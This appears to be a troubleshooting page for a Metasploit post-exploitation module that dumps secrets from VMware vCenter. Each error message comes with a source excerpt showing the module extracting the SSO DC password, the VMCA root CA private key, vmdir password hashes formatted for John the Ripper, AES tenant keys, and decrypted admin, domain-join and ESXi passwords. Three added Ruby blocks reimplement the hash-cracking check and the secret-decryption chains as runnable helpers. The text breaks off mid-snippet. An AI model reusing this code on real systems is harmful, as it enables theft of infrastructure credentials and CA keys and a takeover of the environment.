- Invalid vSphere PSC Machine UUID returned from vmafd-cli
- Could not determine vSphere SSO domain name via lwregshell
- Could not determine vmdir dcAccountDN from lwregshell
- Could not determine vmdir dcAccountPassword from lwregshell
- Error processing LDIF file
- Empty vecs-cli store list returned from vCenter
- Could not extract <STORE_LABEL> private key
- Could not extract <STORE_LABEL> certificate
- Could not locate VMCA_ROOT keypair
- Could not extract VMCA_ROOT private key
- Could not extract VMCA_ROOT certificate
- VMCA_ROOT certificate and private key mismatch
- No password hashes found
- Type <TYPE> hash length is not 128 digits (<DN>)
- Type <TYPE> salt length is not 32 digits (<DN>)
- Hash type <TYPE.INSPECT> is not supported yet (<DN>)
- No SSO ID provider information found
- Error extracting tenant and vpx AES encryption key
- Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got <AES_KEY_LEN>
- Error performing tenant_aes_decrypt
- Error performing tenant_aes_decrypt
- Error updating module keystore
- Error updating module keystore
- Error processing IdP trusted certificate private key
- Error processing IdP trusted certificate chain
- Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
- Unable to associate IdP certificate and private key
- No vSphere Licenses Found
- No vpx_customization_spec entries evident
- Could not determine DER byte length for vpx_customization_spec '<SPEC>'
- Invalid encryption certificate for vpx_customization_spec '<SPEC>'
- Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
- Could not access private key for VM Guest Customization Template '<SPEC>', cannot decrypt
- vCenter private key does not associate with public key for VM Guest Customization Template '<SPEC>', cannot decrypt
- Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
- Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
- No ESXi hosts attached to this vCenter system
- Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
- Invalid x509 certificate extracted from IDM!
- Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter
- No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/
- Could not find <V>
- This module only supports embedded PostgreSQL, appliance reports DB type '<VC_DB_TYPE>'
- Could not find <PSQL_BIN>
- Could not determine vCenter DNS FQDN
- Could not determine vCenter IPv4 address
- Could not find /etc/vmware/deployment.node.type
- Unable to determine appliance deployment type returned from server: <VCSA_TYPE>
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Invalid vSphere PSC Machine UUID returned from vmafd-cli
Here is a relevant code snippet related to the "Invalid vSphere PSC Machine UUID returned from vmafd-cli" error message:
vsphere_machine_id = get_machine_id
if is_uuid?(vsphere_machine_id)
  vprint_status("vSphere Machine ID: #{vsphere_machine_id}")
else
  print_bad('Invalid vSphere PSC Machine UUID returned from vmafd-cli')
end

vsphere_domain_name = get_domain_name
unless is_fqdn?(vsphere_domain_name)
  fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vSphere SSO domain name via lwregshell')
Could not determine vSphere SSO domain name via lwregshell
Here is a relevant code snippet related to the "Could not determine vSphere SSO domain name via lwregshell" error message:
  print_bad('Invalid vSphere PSC Machine UUID returned from vmafd-cli')
end

vsphere_domain_name = get_domain_name
unless is_fqdn?(vsphere_domain_name)
  fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vSphere SSO domain name via lwregshell')
end

self.base_fqdn = vsphere_domain_name.to_s.downcase
vprint_status("vSphere SSO Domain FQDN: #{base_fqdn}")
Could not determine vmdir dcAccountDN from lwregshell
Here is a relevant code snippet related to the "Could not determine vmdir dcAccountDN from lwregshell" error message:
vprint_status("vSphere SSO Domain DN: #{base_dn}")

vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
vsphere_domain_dc_dn = get_domain_dc_dn
unless is_dn?(vsphere_domain_dc_dn)
  fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountDN from lwregshell')
end

self.bind_dn = vsphere_domain_dc_dn
print_good("vSphere SSO DC DN: #{bind_dn}")
self.bind_pw = get_domain_dc_password
Could not determine vmdir dcAccountPassword from lwregshell
Here is a relevant code snippet related to the "Could not determine vmdir dcAccountPassword from lwregshell" error message:
self.bind_dn = vsphere_domain_dc_dn
print_good("vSphere SSO DC DN: #{bind_dn}")
self.bind_pw = get_domain_dc_password
unless bind_pw
  fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountPassword from lwregshell')
end

print_good("vSphere SSO DC PW: #{bind_pw}")
# clean up double quotes
# originally we wrapped in singles, but escaping of single quotes was not working, so prefer doubles
Error processing LDIF file
Here is a relevant code snippet related to the "Error processing LDIF file" error message:
179:
180: def vmdir_dump
181: print_status('Dumping vmdir schema to LDIF and storing to loot...')
182: vmdir_ldif = get_ldif_contents(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
183: if vmdir_ldif.nil?
184: print_error('Error processing LDIF file')
185: return
186: end
187:
188: p = store_loot('vmdir', 'LDIF', rhost, vmdir_ldif, 'vmdir.ldif', 'vCenter vmdir LDIF dump')
189: print_good("LDIF Dump: #{p}")
Empty vecs-cli store list returned from vCenter
Here is a relevant code snippet related to the "Empty vecs-cli store list returned from vCenter" error message:
218:
219: vecs_stores = get_vecs_stores
220: return if vecs_stores.nil?
221:
222: if vecs_stores.empty?
223: print_error('Empty vecs-cli store list returned from vCenter')
224: return
225: end
226:
227: vecs_stores.each do |vecs_store|
228: vecs_entries = get_vecs_entries(vecs_store)
Could not extract <STORE_LABEL> private key
Here is a relevant code snippet related to the "Could not extract <STORE_LABEL> private key" error message:
238: store_label = store_name.upcase
239:
240: vprint_status("Extract #{store_label} key ...")
241: key = get_vecs_private_key(store_name, vecs_entry['Alias'])
242: if key.nil?
243: print_bad("Could not extract #{store_label} private key")
244: else
245: p = store_loot(vecs_entry['Alias'], 'PEM', rhost, key.to_pem.to_s, "#{store_label}.key", "vCenter #{store_label} Private Key")
246: print_good("#{store_label} Key: #{p}")
247: end
248:
Could not extract <STORE_LABEL> certificate
Here is a relevant code snippet related to the "Could not extract <STORE_LABEL> certificate" error message:
247: end
248:
249: vprint_status("Extract #{store_label} certificate ...")
250: cert = validate_x509_cert(vecs_entry['Certificate'])
251: if cert.nil?
252: print_bad("Could not extract #{store_label} certificate")
253: return
254: end
255: p = store_loot(vecs_entry['Alias'], 'PEM', rhost, cert.to_pem.to_s, "#{store_label}.pem", "vCenter #{store_label} Certificate")
256: print_good("#{store_label} Cert: #{p}")
257:
Could not locate VMCA_ROOT keypair
Here is a relevant code snippet related to the "Could not locate VMCA_ROOT keypair" error message:
262:
263: def get_vmca_cert
264: vprint_status('Extract VMCA_ROOT key ...')
265:
266: unless file_exist?('/var/lib/vmware/vmca/privatekey.pem') && file_exist?('/var/lib/vmware/vmca/root.cer')
267: print_error('Could not locate VMCA_ROOT keypair')
268: return
269: end
270:
271: vmca_key_b64 = read_file('/var/lib/vmware/vmca/privatekey.pem')
272:
Could not extract VMCA_ROOT private key
Here is a relevant code snippet related to the "Could not extract VMCA_ROOT private key" error message:
270:
271: vmca_key_b64 = read_file('/var/lib/vmware/vmca/privatekey.pem')
272:
273: vmca_key = validate_pkey(vmca_key_b64)
274: if vmca_key.nil?
275: print_error('Could not extract VMCA_ROOT private key')
276: return
277: end
278:
279: p = store_loot('vmca', 'PEM', rhost, vmca_key, 'VMCA_ROOT.key', 'vCenter VMCA root CA private key')
280: print_good("VMCA_ROOT key: #{p}")
Could not extract VMCA_ROOT certificate
Here is a relevant code snippet related to the "Could not extract VMCA_ROOT certificate" error message:
282: vprint_status('Extract VMCA_ROOT cert ...')
283: vmca_cert_b64 = read_file('/var/lib/vmware/vmca/root.cer')
284:
285: vmca_cert = validate_x509_cert(vmca_cert_b64)
286: if vmca_cert.nil?
287: print_error('Could not extract VMCA_ROOT certificate')
288: return
289: end
290:
291: unless vmca_cert.check_private_key(vmca_key)
292: print_error('VMCA_ROOT certificate and private key mismatch')
VMCA_ROOT certificate and private key mismatch
Here is a relevant code snippet related to the "VMCA_ROOT certificate and private key mismatch" error message:
287: print_error('Could not extract VMCA_ROOT certificate')
288: return
289: end
290:
291: unless vmca_cert.check_private_key(vmca_key)
292: print_error('VMCA_ROOT certificate and private key mismatch')
293: return
294: end
295:
296: p = store_loot('vmca', 'PEM', rhost, vmca_cert, 'VMCA_ROOT.pem', 'vCenter VMCA root CA certificate')
297: print_good("VMCA_ROOT cert: #{p}")
No password hashes found
Here is a relevant code snippet related to the "No password hashes found" error message:
300: end
301:
302: # Shamelessly borrowed from vmware_vcenter_vmdir_ldap.rb
303: def process_hashes(entries)
304: if entries.empty?
305: print_warning('No password hashes found')
306: return
307: end
308:
309: service_details = {
310: workspace_id: myworkspace_id,
Type <TYPE> hash length is not 128 digits (<DN>)
Here is a relevant code snippet related to the "Type <TYPE> hash length is not 128 digits (<DN>)" error message:
324: type, hash, salt = entry[:userpassword].first.unpack('CH128H32')
325:
326: case type
327: when 1
328: unless hash.length == 128
329: vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
330: next
331: end
332:
333: unless salt.length == 32
334: vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
Type <TYPE> salt length is not 32 digits (<DN>)
Here is a relevant code snippet related to the "Type <TYPE> salt length is not 32 digits (<DN>)" error message:
329: vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
330: next
331: end
332:
333: unless salt.length == 32
334: vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
335: next
336: end
337:
338: # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
339: john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
Hash type <TYPE.INSPECT> is not supported yet (<DN>)
Here is a relevant code snippet related to the "Hash type <TYPE.INSPECT> is not supported yet (<DN>)" error message:
336: end
337:
338: # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
339: john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
340: else
341: vprint_error("Hash type #{type.inspect} is not supported yet (#{dn})")
342: next
343: end
344:
345: print_good("vSphere SSO User Credential: #{dn}:#{john_hash}")
346:
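The three hash-processing messages above come from one loop: each vmdir userPassword value is unpacked with 'CH128H32' into a one-byte scheme type, a 64-byte SHA-512 digest and a 16-byte salt, and only type 1 is turned into John's $dynamic_82$ (sha512($p.$s)) line. The following is an added example, not code from the module: it implements that parse with the same length checks, builds the John string, and verifies a candidate password against the digest so the cracking format can be sanity-checked before a long job is started. The sample blob, password and salt are constructed for the example; the SHA-512(password || salt) layout is the one the $dynamic_82$ format denotes.

```ruby
require 'digest'

# Parse a vmdir userPassword blob laid out as the module unpacks it with
# 'CH128H32': 1 type byte, 64-byte SHA-512 digest (128 hex digits), 16-byte
# salt (32 hex digits). Returns nil for unknown types or truncated blobs
# instead of emitting a bogus record, mirroring the module's skip paths.
def parse_vmdir_userpassword(blob)
  type, hash_hex, salt_hex = blob.unpack('CH128H32')
  return nil unless type == 1                       # only scheme 1 is supported
  return nil unless hash_hex.length == 128          # digest must be a full SHA-512
  return nil unless salt_hex.length == 32           # salt must be a full 16 bytes
  {
    type: type,
    hash: hash_hex,
    salt: salt_hex,
    # $dynamic_82$ is John's sha512($p.$s); $HEX$ marks a hex-encoded salt
    john: "$dynamic_82$#{hash_hex}$HEX$#{salt_hex}"
  }
end

# Recompute sha512(password || salt) for a candidate and compare it with the
# digest taken from the blob. Useful to confirm the John line is well-formed
# (e.g. against a known-good test account) before running a cracker on it.
def vmdir_password_match?(parsed, candidate)
  salt = [parsed[:salt]].pack('H*')
  Digest::SHA512.hexdigest(candidate.b + salt) == parsed[:hash]
end

# Constructed sample (not real vCenter data): a type-1 blob for a known
# password and a fixed 16-byte salt, so the parser and verifier run offline.
SAMPLE_PASSWORD = 'VMware1!'
SAMPLE_SALT     = (0..15).to_a.pack('C*')   # bytes 00..0f
SAMPLE_BLOB     = "\x01".b + Digest::SHA512.digest(SAMPLE_PASSWORD.b + SAMPLE_SALT) + SAMPLE_SALT

if $PROGRAM_NAME == __FILE__
  parsed = parse_vmdir_userpassword(SAMPLE_BLOB)
  puts "vSphere SSO User Credential: cn=sample,#{'cn=users,dc=vsphere,dc=local'}:#{parsed[:john]}"
  puts "candidate '#{SAMPLE_PASSWORD}' matches: #{vmdir_password_match?(parsed, SAMPLE_PASSWORD)}"
end
```

The unpack directive never raises on short input; it simply returns a shorter hex string, which is why the explicit 128/32 length checks (the source of the "hash length is not 128 digits" and "salt length is not 32 digits" messages) are still needed.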
No SSO ID provider information found
Here is a relevant code snippet related to the "No SSO ID provider information found" error message:
353: end
354: end
355:
356: def process_sso_providers(entries)
357: if entries.empty?
358: print_warning('No SSO ID provider information found')
359: return
360: end
361:
362: if entries.is_a?(String)
363: entries = entries.split("\n")
Error extracting tenant and vpx AES encryption key
Here is a relevant code snippet related to the "Error extracting tenant and vpx AES encryption key" error message:
401:
402: def get_aes_keys_from_host
403: print_status('Extracting tenant and vpx AES encryption key...')
404:
405: tenant_key = get_aes_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
406: fail_with(Msf::Exploit::Failure::Unknown, 'Error extracting tenant and vpx AES encryption key') if tenant_key.nil?
407:
408: tenant_key.each do |aes_key|
409: aes_key_len = aes_key.length
410: # our first case is to process it out
411: case aes_key_len
Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got <AES_KEY_LEN>
Here is a relevant code snippet related to the "Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got <AES_KEY_LEN>" error message:
421: self.vc_sym_key = aes_key.scan(/../).map(&:hex).pack('C*')
422: self.vc_sym_key_raw = aes_key
423: print_good('vSphere vmware-vpx AES encryption')
424: print_good("\tHEX: #{aes_key}")
425: else
426: print_error("Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got #{aes_key_len}")
427: next
428: end
429:
430: extra_service_data = {
431: address: Rex::Socket.getaddress(rhost),
Error performing tenant_aes_decrypt
Here is a relevant code snippet related to the "Error performing tenant_aes_decrypt" error message:
463: decipher.decrypt
464: decipher.padding = 0
465: decipher.key = vc_tenant_aes_key
466: return (decipher.update(ciphertext) + decipher.final).delete("\000")
467: rescue StandardError => e
468: elog('Error performing tenant_aes_decrypt', error: e)
469: fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')
470: end
471:
472: def update_keystore(public_key, private_key)
473: if public_key.is_a? String
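The key-size message and the tenant_aes_decrypt snippet above describe two steps: the extracted key material arrives either as 16 raw bytes, as 24 Base64 characters, or (for the vpx key) as 32 hex digits that are packed with scan(/../).map(&:hex), and the ciphertext is then decrypted with padding disabled and trailing NUL bytes stripped. The block below is an added example, not the module's code: it normalises all three key encodings to the 16 bytes AES-128 needs and performs the NUL-padded decrypt. One assumption is explicit: the snippet on this page does not show how the cipher object is constructed, so AES-128-ECB is assumed in the CIPHER constant and should be changed if the deployment uses a different mode. The sample key and secret are constructed for the example.

```ruby
require 'base64'
require 'openssl'

# ASSUMPTION: the page's snippet shows only padding = 0 and the key assignment,
# not the cipher name; AES-128-ECB is assumed here. Adjust if needed.
CIPHER = 'aes-128-ecb'

# Normalise tenant/vpx key material to 16 raw bytes. The module accepts
# 16 raw bytes, 24 Base64 characters (decoding to 16 bytes) or 32 hex digits.
def normalize_aes128_key(material)
  case material.length
  when 16
    material.b
  when 24
    key = Base64.strict_decode64(material)
    raise ArgumentError, "Base64 key decoded to #{key.length} bytes, expected 16" unless key.length == 16
    key
  when 32
    raise ArgumentError, 'expected 32 hex digits' unless material.match?(/\A\h{32}\z/)
    [material].pack('H*')
  else
    raise ArgumentError, "Invalid AES key size - expecting 16 raw bytes or 24 Base64 bytes, got #{material.length}"
  end
end

# Decrypt a Base64 secret with padding disabled (vCenter pads with NUL bytes,
# not PKCS#7) and strip the NULs, as the module's tenant_aes_decrypt does.
def tenant_aes_decrypt(b64_ciphertext, key_material)
  key = normalize_aes128_key(key_material)
  ciphertext = Base64.strict_decode64(b64_ciphertext)
  raise ArgumentError, 'ciphertext must be a non-zero multiple of 16 bytes' if ciphertext.empty? || ciphertext.bytesize % 16 != 0
  decipher = OpenSSL::Cipher.new(CIPHER)
  decipher.decrypt
  decipher.padding = 0
  decipher.key = key
  (decipher.update(ciphertext) + decipher.final).delete("\000")
end

# Constructed counterpart: NUL-pad and encrypt a secret the same way so the
# decrypt path can be exercised offline. Not something vCenter exposes.
def tenant_aes_encrypt(plaintext, key_material)
  key = normalize_aes128_key(key_material)
  padded = plaintext.b + ("\000" * ((16 - plaintext.bytesize % 16) % 16))
  padded += "\000" * 16 if padded.empty?
  cipher = OpenSSL::Cipher.new(CIPHER)
  cipher.encrypt
  cipher.padding = 0
  cipher.key = key
  Base64.strict_encode64(cipher.update(padded) + cipher.final)
end

# Constructed sample key in hex and in its 24-character Base64 form.
SAMPLE_KEY_HEX = '000102030405060708090a0b0c0d0e0f'
SAMPLE_KEY_B64 = Base64.strict_encode64([SAMPLE_KEY_HEX].pack('H*'))

if $PROGRAM_NAME == __FILE__
  ct = tenant_aes_encrypt('vsphere-tenant-secret', SAMPLE_KEY_HEX)
  puts "HEX: #{SAMPLE_KEY_HEX}  B64: #{SAMPLE_KEY_B64}"
  puts "decrypted: #{tenant_aes_decrypt(ct, SAMPLE_KEY_B64)}"
end
```

Because delete("\000") removes every NUL, not only trailing ones, a secret that legitimately contains NUL bytes would be altered; for vCenter's string-valued secrets this is not a concern, but it is worth knowing when reusing the helper elsewhere.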

Error updating module keystore
Here is a relevant code snippet related to the "Error updating module keystore" error message:
481: key = private_key
482: end
483: cert_thumbprint = OpenSSL::Digest::SHA1.new(cert.to_der).to_s
484: keystore[cert_thumbprint] = key
485: rescue StandardError => e
486: elog('Error updating module keystore', error: e)
487: fail_with(Msf::Exploit::Failure::Unknown, 'Error updating module keystore')
488: end
489:
490: def get_idp_creds
491: vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
Error processing IdP trusted certificate private key
Here is a relevant code snippet related to the "Error processing IdP trusted certificate private key" error message:
489:
490: def get_idp_creds
491: vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
492: idp_keys = get_idp_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
493: if idp_keys.nil?
494: print_error('Error processing IdP trusted certificate private key')
495: return
496: end
497:
498: idp_certs = get_idp_certs(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
499: if idp_certs.nil?
Error processing IdP trusted certificate chain
Here is a relevant code snippet related to the "Error processing IdP trusted certificate chain" error message:
495: return
496: end
497:
498: idp_certs = get_idp_certs(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
499: if idp_certs.nil?
500: print_error('Error processing IdP trusted certificate chain')
501: return
502: end
503:
504: vprint_status('Parsing vmwSTSTenantCredential certificates and keys ...')
505:
Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
Here is a relevant code snippet related to the "Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work" error message:
516: sts_cert = stscert.to_pem.to_s
517: sts_key = stskey.to_pem.to_s
518: if validate_sts_cert(sts_cert)
519: vprint_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')
520: else # Query IDM to compare our extracted cert with the IDM advertised cert
521: print_warning('Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work')
522: end
523: sts_pem = "#{sts_key}#{sts_cert}"
524: end
525: end
526:
Unable to associate IdP certificate and private key
Here is a relevant code snippet related to the "Unable to associate IdP certificate and private key" error message:
523: sts_pem = "#{sts_key}#{sts_cert}"
524: end
525: end
526:
527: unless sts_pem # We were unable to link a public and private key together
528: print_error('Unable to associate IdP certificate and private key')
529: return
530: end
531:
532: p = store_loot('idp', 'application/x-pem-file', rhost, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
533: print_good("SSO_STS_IDP key: #{p}")
No vSphere Licenses Found
Here is a relevant code snippet related to the "No vSphere Licenses Found" error message:
538: update_keystore(sts_cert, sts_key)
539: end
540:
541: def get_vc_licenses(entries)
542: if entries.empty?
543: print_warning('No vSphere Licenses Found')
544: return
545: end
546:
547: if entries.is_a?(String)
548: entries = entries.split("\n")
No vpx_customization_spec entries evident
Here is a relevant code snippet related to the "No vpx_customization_spec entries evident" error message:
573:
574: def enum_vm_cust_spec
575: vpx_customization_specs = get_vpx_customization_spec(shell_vcdb_pass, vcdb_user, vcdb_name)
576:
577: if vpx_customization_specs.nil?
578: print_warning('No vpx_customization_spec entries evident')
579: return
580: end
581:
582: vpx_customization_specs.each do |spec|
583: xmldoc = vpx_customization_specs[spec]
Could not determine DER byte length for vpx_customization_spec '<SPEC>'
Here is a relevant code snippet related to the "Could not determine DER byte length for vpx_customization_spec '<SPEC>'" error message:
581:
582: vpx_customization_specs.each do |spec|
583: xmldoc = vpx_customization_specs[spec]
584:
585: unless (enc_cert_len = xmldoc.at_xpath('/ConfigRoot/encryptionKey/_length').text.to_i)
586: print_error("Could not determine DER byte length for vpx_customization_spec '#{spec}'")
587: next
588: end
589:
590: enc_cert_der = []
591: der_idx = 0
Invalid encryption certificate for vpx_customization_spec '<SPEC>'
Here is a relevant code snippet related to the "Invalid encryption certificate for vpx_customization_spec '<SPEC>'" error message:
596: der_idx += 1
597: end
598:
599: enc_cert = validate_x509_cert(enc_cert_der.pack('C*'))
600: if enc_cert.nil?
601: print_error("Invalid encryption certificate for vpx_customization_spec '#{spec}'")
602: next
603: end
604:
605: enc_cert_thumbprint = OpenSSL::Digest::SHA1.new(enc_cert.to_der).to_s
606: vprint_status("Secrets for '#{spec}' were encrypted using public certificate with SHA1 digest #{enc_cert_thumbprint}")
Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
Here is a relevant code snippet related to the "Could not associate encryption public key with any of the private keys extracted from vCenter, skipping" error message:
604:
605: enc_cert_thumbprint = OpenSSL::Digest::SHA1.new(enc_cert.to_der).to_s
606: vprint_status("Secrets for '#{spec}' were encrypted using public certificate with SHA1 digest #{enc_cert_thumbprint}")
607:
608: unless (enc_keystore_entry = keystore[enc_cert_thumbprint])
609: print_warning('Could not associate encryption public key with any of the private keys extracted from vCenter, skipping')
610: next
611: end
612:
613: vc_cipher_key = validate_pkey(enc_keystore_entry)
614: if vc_cipher_key.nil?
Could not access private key for VM Guest Customization Template '<SPEC>', cannot decrypt
Here is a relevant code snippet related to the "Could not access private key for VM Guest Customization Template '<SPEC>', cannot decrypt" error message:
610: next
611: end
612:
613: vc_cipher_key = validate_pkey(enc_keystore_entry)
614: if vc_cipher_key.nil?
615: print_error("Could not access private key for VM Guest Customization Template '#{spec}', cannot decrypt")
616: next
617: end
618:
619: unless enc_cert.check_private_key(vc_cipher_key)
620: print_error("vCenter private key does not associate with public key for VM Guest Customization Template '#{spec}', cannot decrypt")
vCenter private key does not associate with public key for VM Guest Customization Template '<SPEC>', cannot decrypt
Here is a relevant code snippet related to the "vCenter private key does not associate with public key for VM Guest Customization Template '<SPEC>', cannot decrypt" error message:
615: print_error("Could not access private key for VM Guest Customization Template '#{spec}', cannot decrypt")
616: next
617: end
618:
619: unless enc_cert.check_private_key(vc_cipher_key)
620: print_error("vCenter private key does not associate with public key for VM Guest Customization Template '#{spec}', cannot decrypt")
621: next
622: end
623:
624: key_digest = OpenSSL::Digest::SHA1.new(vc_cipher_key.to_der).to_s
625: vprint_status("Decrypt using #{vc_cipher_key.n.num_bits}-bit #{vc_cipher_key.oid} SHA1: #{key_digest}")
Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
Here is a relevant code snippet related to the "Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'" error message:
636: when 'false'
637: secret_ciphertext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text
638: ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse
639: secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete("\000")
640: else
641: print_error("Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'")
642: next
643: end
644: print_status("Initial administrator account password found for vpx_customization_spec '#{spec}':")
645: print_good("\tInitial Admin PW: #{secret_plaintext}")
646:
Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
Here is a relevant code snippet related to the "Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'" error message:
673: when 'false'
674: secret_ciphertext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text
675: ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse
676: secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete("\000")
677: else
678: print_error("Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'")
679: next
680: end
681:
682: print_status("AD domain join account found for vpx_customization_spec '#{spec}':")
683:
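The keystore, association and decryption messages above describe one chain: every certificate/private-key pair plundered from vCenter is stored under the SHA-1 thumbprint of the certificate's DER encoding; each vpx_customization_spec carries the certificate its secrets were encrypted to, so its thumbprint selects the key; check_private_key confirms the pair; and the secret itself is Base64-decoded, byte-reversed, RSA PKCS#1 v1.5 decrypted and stripped of NULs. The block below is an added example, not the module's code, that implements that chain end to end with the same skip conditions, and includes a constructed encrypt side so the round trip runs offline. The keys and self-signed certificates are generated at load time for the example; the module's decrypt(ciphertext, rsa_padding_mode: 'pkcs1') call is written here as the equivalent private_decrypt with PKCS1_PADDING.

```ruby
require 'base64'
require 'openssl'

# Keystore lookup key: hex SHA-1 of the certificate DER, exactly what the
# module computes for both the extracted certs and the spec's embedded cert.
def cert_thumbprint(cert)
  OpenSSL::Digest::SHA1.hexdigest(cert.to_der)
end

# Build {thumbprint => private_key} from extracted (cert, key) pairs.
def build_keystore(pairs)
  pairs.each_with_object({}) do |(cert, key), store|
    store[cert_thumbprint(cert)] = key
  end
end

# Decrypt one customization-spec secret. Returns [plaintext, nil] on success
# or [nil, reason] for the same conditions the module reports and skips.
def decrypt_spec_secret(keystore, enc_cert, b64_ciphertext)
  key = keystore[cert_thumbprint(enc_cert)]
  return [nil, 'no private key for thumbprint'] unless key
  return [nil, 'private key does not match certificate'] unless enc_cert.check_private_key(key)

  ciphertext = Base64.strict_decode64(b64_ciphertext).reverse   # vCenter stores the RSA block byte-reversed
  plaintext  = key.private_decrypt(ciphertext, OpenSSL::PKey::RSA::PKCS1_PADDING).delete("\000")
  [plaintext, nil]
rescue OpenSSL::PKey::RSAError, ArgumentError => e
  [nil, "decrypt failed: #{e.class}"]
end

# Constructed counterpart of the storage format (RSA PKCS#1 -> reverse ->
# Base64) so the decrypt path can be exercised without a vCenter database.
def encrypt_spec_secret(enc_cert, plaintext)
  blob = enc_cert.public_key.public_encrypt(plaintext, OpenSSL::PKey::RSA::PKCS1_PADDING)
  Base64.strict_encode64(blob.reverse)
end

# Minimal self-signed certificate for a generated key (example only).
def make_self_signed(key, cn)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  cert
end

# Constructed material: one pair that is "extracted" into the keystore and a
# second pair that is not, standing in for a spec encrypted to a foreign cert.
VC_KEY     = OpenSSL::PKey::RSA.new(2048)
VC_CERT    = make_self_signed(VC_KEY, 'vcenter.lab.example')
OTHER_KEY  = OpenSSL::PKey::RSA.new(2048)
OTHER_CERT = make_self_signed(OTHER_KEY, 'other.lab.example')
KEYSTORE   = build_keystore([[VC_CERT, VC_KEY]])

if $PROGRAM_NAME == __FILE__
  ct = encrypt_spec_secret(VC_CERT, 'Admin!Pass1')
  pt, err = decrypt_spec_secret(KEYSTORE, VC_CERT, ct)
  puts "Initial Admin PW: #{pt || err}"
  pt, err = decrypt_spec_secret(KEYSTORE, OTHER_CERT, encrypt_spec_secret(OTHER_CERT, 'x'))
  puts "foreign cert: #{pt || err}"
end
```

The thumbprint lookup is what makes the "Could not associate encryption public key" warning actionable: if a spec's thumbprint is not in the keystore, the secret was encrypted to a certificate that was never extracted (typically a previous MACHINE_SSL or VMCA_ROOT that has since been rotated), and no amount of re-running the decrypt will recover it without that older key.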
No ESXi hosts attached to this vCenter system
Here is a relevant code snippet related to the "No ESXi hosts attached to this vCenter system" error message:
707:
708: def enum_vpx_user_creds
709: vpxuser_rows = get_vpx_users(shell_vcdb_pass, vcdb_user, vcdb_name, vc_sym_key)
710:
711: if vpxuser_rows.nil?
712: print_warning('No ESXi hosts attached to this vCenter system')
713: return
714: end
715:
716: vpxuser_rows.each do |user|
717: print_good("ESXi Host #{user['fqdn']} [#{user['ip']}]\t LOGIN: #{user['user']} PASS: #{user['password']}")
Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
Here is a relevant code snippet related to the "Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM" error message:
768: vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...')
769:
770: idm_cmd = cmd_exec("curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT")
771:
772: if idm_cmd.blank?
773: print_error('Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM')
774: return false
775: end
776:
777: if (idm_json = JSON.parse(idm_cmd).first)
778: idm_json['certificates'].each do |idm|
Invalid x509 certificate extracted from IDM!
Here is a relevant code snippet related to the "Invalid x509 certificate extracted from IDM!" error message:
776:
777: if (idm_json = JSON.parse(idm_cmd).first)
